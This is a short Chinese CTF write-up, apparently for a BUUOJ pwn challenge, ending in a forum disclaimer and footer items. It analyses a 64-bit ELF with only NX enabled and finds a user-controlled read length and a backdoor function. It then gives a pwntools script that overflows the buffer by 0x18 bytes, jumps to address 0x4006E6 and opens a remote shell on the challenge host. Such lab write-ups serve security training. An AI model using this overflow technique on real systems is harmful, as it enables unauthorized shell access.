首先nc一下远程环境,看一下他有什么功能。发现有两个输入,第一个是输入名字的长度,第二个是输入名字。
file 查看一下给的附件。是一个64位的 ELF 可执行文件。
checksec 查看文件的安全保护。得知启动了NX栈保护,其他保护都没开。
使用IDA查看文件的main函数。在打开时需要区分32位与64位,低版本的IDA,32位文件需要在IDA32中打开,但是IDA版本较高时就不用管了,32位也可以放在IDA64中打开。
查看伪代码:
发现了 scanf 这个这个高危函数。
程序流程:用户输入一个整数,并把此数存在 nbytes 变量中,再提示用户输入姓名,然后使用read函数从标准输入读取指定长度(由 nbytes 决定)的数据到 buf 数组中。
并且在函数中发现了 backdoor 这个后门函数,因此我们就需要造成程序的溢出再让其覆盖 backdoor 函数的位置,得到 shell
查看我们需要填充的字节为 0x10+8=0x18
backdoor 函数的内存地址为:0x4006E6
编写exp:- from pwn import *
- r=remote('node5.buuoj.cn',29605)
- backdoor_addr=0x4006E6
- #ret = 0x401198
- payload=b'a'*0x18+p64(backdoor_addr)
- r.sendlineafter('name','123')
- r.sendline(payload)
- r.interactive()
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
